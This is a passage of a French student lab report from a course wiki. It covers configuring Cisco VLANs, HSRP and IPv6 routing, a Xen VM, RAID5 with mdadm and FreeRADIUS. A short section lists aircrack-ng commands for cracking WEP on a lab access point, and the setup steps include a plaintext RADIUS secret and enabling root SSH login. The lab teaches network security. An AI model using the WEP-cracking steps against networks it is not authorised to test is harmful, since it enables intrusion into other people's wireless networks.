  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Installation de freeradius &lt;br /&gt;
  apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/freeradius/3.0/users on ajoute la ligne&lt;br /&gt;
&lt;br /&gt;
  Dionysos Cleartext-Password :=NOTRE_MDP_ROOT&lt;br /&gt;
&lt;br /&gt;
Le serveur doit être configuré en PEAP-MSCHAPv2. Nous devons modifier :&lt;br /&gt;
&lt;br /&gt;
-/etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
-etc/freeradius/3.0/mods-enabled/mschap&lt;br /&gt;
  mschap {&lt;br /&gt;
     ...&lt;br /&gt;
     use_mppe = yes&lt;br /&gt;
     require_encryption = yes&lt;br /&gt;
     require_strong = yes&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
Dans cette même section nous ajoutons la ligne  &lt;br /&gt;
  with_ntdomain_hack = yes&lt;br /&gt;
&lt;br /&gt;
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :&lt;br /&gt;
client 192.168.0.10/32&lt;br /&gt;
{&lt;br /&gt;
  secret = secretIMA5SC&lt;br /&gt;
  shortname = accesDionysos&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur Cordouan =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
Mise à disposition d'un réseau IPv4 routé : &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; dans le VLAN 110 de l'école&lt;br /&gt;
&lt;br /&gt;
Lors de la réalisation de ce TP, le réseau était déjà découpé en deux partie.&lt;br /&gt;
&lt;br /&gt;
La première pour les IMA2A5 : allant de &amp;lt;code&amp;gt;193.48.57.160/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.175/28&amp;lt;/code&amp;gt;&lt;br /&gt;
La seconde était encore inutilisée : Nous avions donc à disposition les adresses allant de &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.191/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec un masque &amp;lt;code&amp;gt;/28&amp;lt;/code&amp;gt; ('''240''') nous avions donc 16 adresses dans le réseau &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons donc établi avec le groupe routeur 2 (Binôme 11) le plan d'adressage suivant&lt;br /&gt;
&lt;br /&gt;
* .176 : adresse de réseau&lt;br /&gt;
* .177 à .187 : les adresses IP des machines virtuelles Xen&lt;br /&gt;
* .188 : adresse du '''Routeur 1'''&lt;br /&gt;
* .189 : adresse du '''Routeur 2'''&lt;br /&gt;
* .190 : adresse du '''Routeur Virtuel'''&lt;br /&gt;
* .191 : adresse de diffusion&lt;br /&gt;
&lt;br /&gt;
Nous avions également à utiliser un réseau IPv4 non routé (&amp;lt;code&amp;gt;10.60.0.0/16&amp;lt;/code&amp;gt;) où chaque binôme devait avoir un sous-réseau.&lt;br /&gt;
&lt;br /&gt;
Les IMA2A5 avaient choisi d'utiliser des réseau de la forme : &amp;lt;code&amp;gt;10.60.N.0/24&amp;lt;/code&amp;gt; où '''N''' est le numéro de binôme, variant de 1 à 5 dans leur cas.&lt;br /&gt;
&lt;br /&gt;
Nous avons repris cette idée en prenant la forme &amp;lt;code&amp;gt;10.60.10+N.0/24&amp;lt;/code&amp;gt; avec pour choix, en vue de la configuration des routeurs :&lt;br /&gt;
&lt;br /&gt;
* Adresse du routeur 1 : 10.60.11.252/24&lt;br /&gt;
* Adresse du routeur 2 : 10.60.11.253/24&lt;br /&gt;
* Adresse du routeur virtuel : 10.60.11.254/24&lt;br /&gt;
&lt;br /&gt;
Rappel du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
* [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5sc_2018/2019 IMA5sc 2018/19]&lt;br /&gt;
&lt;br /&gt;
==== 3.3 Le routage de sites (IPv4) - Routeur Cisco 3560 ====&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes chargés de la configuration du routeur 1, le Cisco 3560.&lt;br /&gt;
&lt;br /&gt;
Comme nous étions situés sur la Zabeth09, nous avons pu utiliser un câble muni d'un adaptateur pour relier en USB la Zabeth au port console du routeur.&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite utilisé &amp;lt;code&amp;gt;minicom -os&amp;lt;/code&amp;gt; en '''root''' avec les réglages suivants :&lt;br /&gt;
&lt;br /&gt;
* '''/dev/ttyUSB0'''&lt;br /&gt;
* '''9600 8N1'''&lt;br /&gt;
* Hardware Flow Control : '''No'''&lt;br /&gt;
&lt;br /&gt;
On arrive ensuite sur le routeur. '''Switch&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
Rappel des commandes Cisco utiles (ou [https://tvantroys.plil.fr/IMA4/network/ Cours de réseau IMA4]&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;enable&amp;lt;/code&amp;gt; : permet de passer en EXEC privilégié sur le Cisco&lt;br /&gt;
* &amp;lt;code&amp;gt;configure terminal&amp;lt;/code&amp;gt; : peut aussi être remplacé par &amp;lt;code&amp;gt;conf t&amp;lt;/code&amp;gt; pour passer en mode de configuration globale&lt;br /&gt;
* &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; : pour retourner à un niveau prédédent&lt;br /&gt;
* &amp;lt;code&amp;gt;write&amp;lt;/code&amp;gt; : au niveau privilégié de base, permet de sauvegarder la configuration&lt;br /&gt;
* &amp;lt;code&amp;gt;interface NOM_INTERFACE&amp;lt;/code&amp;gt; : pour configurer  une interface (peut aussi s'écrire &amp;lt;code&amp;gt;int NOM_INTERFACE&amp;lt;/code&amp;gt;)&lt;br /&gt;
* &amp;lt;code&amp;gt;?&amp;lt;/code&amp;gt; : pour afficher les commandes possibles au niveau actuel&lt;br /&gt;
&lt;br /&gt;
Dans cette partie on s'intéresse à la configuration des interfaces en IPv4 :&lt;br /&gt;
&lt;br /&gt;
Au niveau de l'architecture, nous voulons que le réseau soit redondant, ainsi il faut que les deux routeurs puissent effectuer le même travail mais pas en même temps.&lt;br /&gt;
&lt;br /&gt;
L'un des deux réalise le travail (il est prioritaire) et l'autre vérifie que le travail est effectué, en cas d'arrêt, il prend le relais.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, le groupe 11 (routeur 2) a décidé de mettre une priorité basse dans la configuration de leur routeur.&lt;br /&gt;
&lt;br /&gt;
Rappel : Le réseau s'organise sur plusieurs VLANs&lt;br /&gt;
&lt;br /&gt;
* VLAN 1 : Pour les autres composants tels que la borne wifi configurée par le groupe 1.&lt;br /&gt;
* VLAN 43 : Il s'agit du VLAN où sont les machines XEN IMA5. Les IMA2A5 avaient opté pour le VLAN 42.&lt;br /&gt;
* VLAN 131 : Le VLAN d'interconnexion de l'école. (SR52), les IMA2A5 utilisent le VLAN 130.&lt;br /&gt;
* VLAN 11 à 21 : Un VLAN par binôme, c'est dans ces VLAN que nous utiliserons les adresses de la forme '''10.60.10+N.X'''. Comme pour les adresses, nous avons opté pour des numéros de la forme 10+Numéro de groupe.&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 1 =====&lt;br /&gt;
&lt;br /&gt;
Il est juste question d'attribuer au routeur une adresse dans le vlan 1 pour la borne wifi&lt;br /&gt;
&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43 &lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On commence par supprimer l'interface (&amp;lt;code&amp;gt;no int vlan43&amp;lt;/code&amp;gt;) en cas de doute sur sa configuration puis on la recrée et on attribue au routeur une adresse IP (188 = routeur 1) dans le VLAN (190 = routeur virtuel).&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
* Remplacer &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN et &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification =====&lt;br /&gt;
&lt;br /&gt;
Pour tester on peut tenter de ping le routeur depuis une source exterieure ou alors utiliser un routeur pour ping l'autre.&lt;br /&gt;
&lt;br /&gt;
* Ping depuis une machine virtuelle vers '''193.48.57.188''' (routeur 1) &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping dionysos r1.png]]&lt;br /&gt;
&lt;br /&gt;
* Ping depuis le routeur 1 vers '''193.48.57.189''' (routeur 2)&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping r1 r2.png]]&lt;br /&gt;
&lt;br /&gt;
==== 3.4 Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous retournons dans la configuration des interfaces pour ajouter un routage via IPv6.&lt;br /&gt;
&lt;br /&gt;
Dans le sujet il est indiqué que les adresses disponibles se situent à partir de &amp;lt;code&amp;gt;2001:660:4401:60b0::/64&amp;lt;/code&amp;gt; mais les premières adresses étant prises par les IMA2A5 nous utiliserons les adresses en '''C0''' et plus plutôt qu'à partir '''B0'''&lt;br /&gt;
&lt;br /&gt;
* ajouter à la configuration globale &lt;br /&gt;
&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On supprime à nouveau l'interface (mais ce n'est pas nécessaire) pour y imposer la nouvelle configuration de l'interface&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
Remplacer &lt;br /&gt;
&lt;br /&gt;
